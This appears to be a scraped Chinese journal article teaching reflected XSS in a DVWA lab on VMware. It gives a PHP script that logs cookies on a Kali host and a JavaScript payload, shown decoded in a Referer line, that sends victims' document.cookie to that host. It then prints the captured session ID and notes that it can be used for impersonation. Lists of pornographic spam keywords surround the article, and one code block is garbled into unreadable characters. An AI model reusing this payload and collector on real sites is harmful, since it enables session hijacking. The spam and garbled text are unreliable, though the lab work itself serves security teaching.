999精品在线视频,手机成人午夜在线视频,久久不卡国产精品无码,中日无码在线观看,成人av手机在线观看,日韩精品亚洲一区中文字幕,亚洲av无码人妻,四虎国产在线观看 ?

基于DVWA下XSS跨站腳本攻擊原理與實(shí)踐

2018-05-14 09:06:16余立強(qiáng)
絲路視野 2018年29期

【摘要】分析反射型跨站腳本攻擊的原理,在VMWare虛擬機(jī)軟件中建立由Metasploitable2、Kali和Windows等組成的虛擬機(jī)局域網(wǎng),配置虛擬機(jī)網(wǎng)絡(luò),調(diào)試好DVWA網(wǎng)站平臺(tái),建立WEB服務(wù),編寫(xiě)獲取cookie值的PHP程序,編寫(xiě)JavaScript惡意腳本,較好地達(dá)到了實(shí)踐操作的效果。

【關(guān)鍵詞】DVWA;XSS;跨站腳本;cookie;VMWare

XSS攻擊即為跨站腳本攻擊,英文為CrossSiteScripting,為不和層疊樣式表(CascadingStyleSheets,CSS)的縮寫(xiě)混淆,故將跨站腳本攻擊縮寫(xiě)為XSS。這是當(dāng)前一種非常重要的攻擊方式,其危害主要體現(xiàn)在以下幾個(gè)方面:盜取用戶cookie;修改網(wǎng)頁(yè)內(nèi)容;網(wǎng)站掛馬;利用網(wǎng)站重定向;XSS蠕蟲(chóng)等。

XSS攻擊分為反射型(XSSreflected)、存儲(chǔ)型(XSS stored)及本地利用漏洞型三種類(lèi)型,這里僅介紹反射型跨站腳本攻擊的原理與實(shí)踐操作。

一、XSS跨站腳本攻擊原理

利用DVWA平臺(tái)進(jìn)行XSS跨站腳本攻擊的原理示意如圖1所示。

在圖1中,攻擊者在有XSS漏洞的網(wǎng)站中將網(wǎng)頁(yè)嵌入惡意腳本,如用JavaScript編寫(xiě)的惡意代碼,當(dāng)被攻擊用戶使用瀏覽器瀏覽點(diǎn)擊被嵌入惡意代碼網(wǎng)頁(yè)中的鏈接時(shí),惡意代碼將會(huì)在用戶的瀏覽器上執(zhí)行,將被攻擊用戶的信息如Cookie值傳輸給攻擊者(黑客)。攻擊者獲取到被攻擊用戶的Cookie值后繞過(guò)賬號(hào)及密碼的輸入驗(yàn)證,直接登錄到用戶的網(wǎng)站,獲取更有價(jià)值的信息。從而實(shí)現(xiàn)了跨過(guò)有XSS漏洞的網(wǎng)站對(duì)被攻擊用戶進(jìn)行攻擊。因此,XSS跨站腳本攻擊與文件包含、命令執(zhí)行、SQL注入等針對(duì)服務(wù)器端的攻擊方式有很大差異,更具有隱蔽性和破壞性。

二、XSS跨站腳本攻擊模擬環(huán)境拓?fù)浣Y(jié)構(gòu)

構(gòu)建XSS跨站腳本攻擊模擬環(huán)境的拓?fù)浣Y(jié)構(gòu)如圖2所示。

宿主機(jī)一般為Windows7/10系統(tǒng)的PC機(jī),安裝VMWareWorkstation10.0以上版本軟件;有跨站漏洞的網(wǎng)站由Metasploitable2虛擬機(jī)中的DVWA平臺(tái)擔(dān)承;攻擊機(jī)是Kali虛擬機(jī)集成攻擊工具;客戶機(jī)是Windows7系統(tǒng)。這些虛擬機(jī)由VMWare虛擬網(wǎng)絡(luò)構(gòu)成星形拓?fù)浣Y(jié)構(gòu)的以太局域網(wǎng)。

三、模擬環(huán)境中虛擬機(jī)網(wǎng)絡(luò)配置

(一)虛擬機(jī)的網(wǎng)絡(luò)配置

在圖2所示的拓?fù)浣Y(jié)構(gòu)中,各虛擬機(jī)的網(wǎng)絡(luò)連接模式及IP地址分配按表1設(shè)置。

表1中的IP地址可以自己規(guī)劃??紤]到宿主機(jī)通常要連接到外部網(wǎng)絡(luò)并與內(nèi)部虛擬機(jī)網(wǎng)絡(luò)的連通,因此,在VMWare中對(duì)各虛擬機(jī)選擇“僅主機(jī)”或“NAT”模式連接,使本環(huán)境中的虛擬機(jī)不暴露在外網(wǎng)易受攻擊的網(wǎng)絡(luò)中,保護(hù)宿主機(jī)的安全。

(二)VMWare虛擬機(jī)平臺(tái)軟件設(shè)置

在VMWareWorkstation10以上的軟件版本上,修改VMWare的網(wǎng)絡(luò)連接編輯配置,操作如下。

(1)點(diǎn)擊VMWare軟件菜單“編輯”,選擇“虛擬網(wǎng)絡(luò)編輯器”,進(jìn)入如圖3所示的窗口。

(2)點(diǎn)擊VMnet1(僅主機(jī)模式),其配置按圖3設(shè)置。

(三)網(wǎng)絡(luò)連通性測(cè)試

經(jīng)過(guò)上述配置后,分別進(jìn)入三臺(tái)虛擬機(jī),進(jìn)行網(wǎng)絡(luò)連通性測(cè)試。

(1)三臺(tái)虛擬機(jī)間能相互ping通。

(2)宿主機(jī)ping通各虛擬機(jī)。

(3)虛擬機(jī)ping不通宿主機(jī)。

四、XSS跨站腳本攻擊前的準(zhǔn)備工作

(一)調(diào)試有XSS漏洞的DVWA網(wǎng)站

!.調(diào)試"#$%網(wǎng)站平臺(tái)

進(jìn)入&()*+,-.()/,0虛擬機(jī),核查12地址,輸入命令:3.+ )445

在被攻擊用戶中打開(kāi)16瀏覽器,在地址欄中輸入:7((+8 99?。?.;<.0.0==9

顯示&()*+,-.()/,0頁(yè)面,其中有"#$%的鏈接,點(diǎn)擊之>即可進(jìn)入"#$%網(wǎng)站的界面。如果不能顯示相關(guān)的頁(yè)面,請(qǐng)檢查網(wǎng)絡(luò)配置。

0.編寫(xiě)?)@)AB5.+(惡意代碼

可將?)@)AB5.+(的惡意代碼以文本文件C)@)*B5.+(.(D(保存在宿主機(jī)中>其:

E *B5.+( F 4-BGHI(.J5.( K LE .HM*5B N O 7((+8 99?。?.;<.0.0!P9)BB+(Q B--R..+7+S B--R.NL T4-BGHI(.B--R. TL O J.4(7N= 7.M7(N= /-545N= 9FL U V ),5( K 9WAA9 U E9*B5.+(F

(二)Kali攻擊機(jī)

攻擊機(jī)是Kali2016,并利用其中的LAMP(apache2、MySQL、PHP服務(wù))平臺(tái)環(huán)境用來(lái)接收被害者的cookie值。

1.啟動(dòng)apache2服務(wù)

啟動(dòng)apache2服務(wù),輸入命令:#serviceapache2start

2.瀏覽驗(yàn)證apache2的默認(rèn)主頁(yè)

在被攻擊用戶中打開(kāi)IE瀏覽器,地址欄處輸入:http://172.49.2.216,顯示apache2的默認(rèn)頁(yè)面。

3.編輯accept_cookie.php程序代碼

在Kali2016集成工具中安裝有PHP程序驅(qū)動(dòng)模塊,能夠解釋PHP程序的執(zhí)行。因此,要在Kali2016的apache2默認(rèn)主頁(yè)的子目錄/var/www/html/中編輯accept_cookie.php程序:

#vi/var/www/html/accept_cookie.php

<?php

date_default_timezone_set('Asia/Shanghai');

$cookie=$_GET['cookie'];//GETcookie

$ip=getenv('REMOTE_ADDR');//RemoteIP

$time=date('Y-m-dg:i:s');//

$referer=getenv('HTTP_REFERER');//refer

$agent=$_SERVER['HTTP_USER_AGENT'];//AGENT

$fp=fopen('/tmp/cookie.txt','a');//..cookie.txt

fwrite($fp,IP:.$ip.\nDateandTime:.$time.\nUserAgent:.$agent.\nReferer:.$referer.\nCookie:.$cookie.\n\n\n);//

fclose($fp);//

?>

保存退出。

accept_cookie.php程序由上述JavaScript腳本調(diào)用執(zhí)行。其功能是將被害人的cookie值保存到Kali2016的子目錄/tmp中,文件名為cookie.txt。

請(qǐng)注意子目錄/tmp的權(quán)限屬性為:

drwxrwxrwx12rootroot4096Nov1012:29tmp

即其它用戶要有“寫(xiě)”的權(quán)限,否則,cookie.txt文件不能被寫(xiě)入/tmp目錄中。當(dāng)然,也可以指定其它子目錄存放cookie.txt,只需該子目錄對(duì)其它用戶開(kāi)放寫(xiě)的權(quán)限。

五、XSS跨站腳本攻擊

在上述準(zhǔn)備工作后,可以隨時(shí)實(shí)施XSS攻擊,其攻擊過(guò)程如下:

(1)在被攻擊用戶中打開(kāi)IE瀏覽器,在地址欄中輸入:http://172.49.2.200/

(2)在Metasploitable2頁(yè)面中點(diǎn)擊DVWA鏈接,進(jìn)入DVWA網(wǎng)站平臺(tái);

(3)輸入賬號(hào):admin;密碼:password

(4)登錄成功后,在左側(cè)欄中選擇:DVWAsecurity,并在右側(cè)窗口選擇安全等級(jí)為:low,并點(diǎn)擊“Submit”提交;

(5)繼續(xù)在左側(cè)欄中選擇:XSSreflected;在右側(cè)窗口的文本窗口中復(fù)制粘貼前述的“JavaScript的惡意代碼”,點(diǎn)擊“Submit”提交,有彈出窗口顯示“/XSS”,如圖4所示。

(6)在攻擊機(jī)上輸入命令:

#ls-l/tmp

#cat/tmp/cookie.txt

顯示:IP:172.49.2.7

DateandTime:2018-11-1112:21:06

UserAgent:Mozilla/4.0(compatible;MSIE8.0;Windows NT6.1;WOW64;Trident/4.0;SLCC2;.NETCLR2.0.50727;.NETCLR3.5.30729;.NETCLR3.0.30729;MediaCenterPC 6.0)

Referer:

http://172.49.2.200/dvwa/vulnerabilities/XSS_r/?name=%3Cscript%3Edocument.write%28%27%3Cimg+src% 3D%22http%3A%2F%2F172.49.2.216%2Faccept_cookie.php%3Fcookie%3D%27%2Bdocument.cookie%2B% 27%22width%3D0+height%3D0+border%3D0+%2F%3E% 27%29%3Balert%28%2FXSS%2F%29%3C%2Fscript%3E+

Cookie:security=low;

PHPSESSID=477dad0e5bc889a6bd98e9727816ad25

從上面的顯示中看到了被攻擊用戶的cookie值:477dad0e5bc889a6bd98e9727816ad25

至此,攻擊者就可以利用cookie值冒充被攻擊用戶登錄到網(wǎng)站中獲取其個(gè)人隱私信息。關(guān)于cookie值的利用請(qǐng)參考其它相關(guān)資料。

六、結(jié)語(yǔ)

由于XSS是針對(duì)客戶端瀏覽器的攻擊,而目前的很多瀏覽器都已經(jīng)自帶了XSS防御功能,因而建議被攻擊用戶的系統(tǒng)可采用windows7/XP/2003虛擬機(jī),通過(guò)IE8/IE6瀏覽器去訪問(wèn)DVWA,這樣能順利地獲得攻擊實(shí)踐操作的效果。

參考文獻(xiàn)

[1]felix.手把手教你如何搭建自己的滲透測(cè)試環(huán)境[EB/OL]. 2016-04-27:http://www.freebuf.com/sectool/102661.html.

[2]謝文東的圍脖.Metasploitable2使用指南[EB/OL].2014-05-18:https://www.freebuf.com/articles/system/34571.html.

[3]百度經(jīng)驗(yàn).如何安裝全新的KaliLinux系統(tǒng)[EB/OL].:https://jingyan.baidu.com/article/ca2d939d62f4eaeb6c31ce 0f.html.

[4]Nightsay.【XSS】dvwa平臺(tái)下的實(shí)戰(zhàn)[EB/OL].2015-05-19:https://blog.csdn.net/Nightsay/article/details/45833353.

[5]百度百科.XSS攻擊[EB/OL].2018-06-16:https://baike. baidu.com/item/XSS攻擊/954065?fr=aladdin.

作者簡(jiǎn)介:余立強(qiáng)(1960—),男,江蘇無(wú)錫人,無(wú)錫商業(yè)職業(yè)技術(shù)學(xué)院物聯(lián)網(wǎng)技術(shù)學(xué)院,高級(jí)工程師,研究方向:計(jì)算機(jī)網(wǎng)絡(luò)安全與云計(jì)算。

主站蜘蛛池模板: 日日拍夜夜嗷嗷叫国产| 久久久精品久久久久三级| 试看120秒男女啪啪免费| 国产精品白浆在线播放| 欧美日在线观看| 蜜芽一区二区国产精品| 亚洲精品桃花岛av在线| 国产人碰人摸人爱免费视频| 大陆精大陆国产国语精品1024| 日本不卡在线| 人妻免费无码不卡视频| 91口爆吞精国产对白第三集 | 少妇精品久久久一区二区三区| 国产精品永久免费嫩草研究院| 18禁影院亚洲专区| 欧美狠狠干| 熟女日韩精品2区| 欧美 亚洲 日韩 国产| 亚洲Av激情网五月天| 欧美色综合久久| 国产另类视频| 欧美成人第一页| 538国产视频| 日韩最新中文字幕| 狠狠色香婷婷久久亚洲精品| 99偷拍视频精品一区二区| 欧美a在线| 自拍中文字幕| 成人夜夜嗨| 伊人激情综合网| 人人91人人澡人人妻人人爽| 国产精品夜夜嗨视频免费视频| 成人伊人色一区二区三区| 本亚洲精品网站| 操美女免费网站| 99热6这里只有精品| 色婷婷狠狠干| 亚洲va精品中文字幕| 一级做a爰片久久免费| 久草青青在线视频| 99久久免费精品特色大片| 亚洲人成高清| 国产乱子伦精品视频| 欧美高清国产| 国产精品xxx| 风韵丰满熟妇啪啪区老熟熟女| 亚洲精品制服丝袜二区| 青青草原国产av福利网站| 重口调教一区二区视频| 国产综合网站| 在线观看亚洲天堂| 国产成人乱码一区二区三区在线| 免费观看亚洲人成网站| 韩日无码在线不卡| 久久人体视频| 一级毛片不卡片免费观看| 久久国产成人精品国产成人亚洲| 亚洲激情区| 国产91无码福利在线| 婷婷中文在线| 欧美一级99在线观看国产| 日韩在线成年视频人网站观看| 欧美第一页在线| 一本二本三本不卡无码| 国产va在线观看| 99在线视频网站| 日本免费a视频| 国产91熟女高潮一区二区| 国产成人亚洲综合a∨婷婷| 91精品国产一区| 亚洲精品视频免费看| 无码 在线 在线| 朝桐光一区二区| 无码高潮喷水专区久久| 婷婷亚洲最大| 免费av一区二区三区在线| 亚洲国产综合自在线另类| 在线不卡免费视频| 国产精品手机在线播放| 91久久青青草原精品国产| 欧美在线视频a| 99ri精品视频在线观看播放|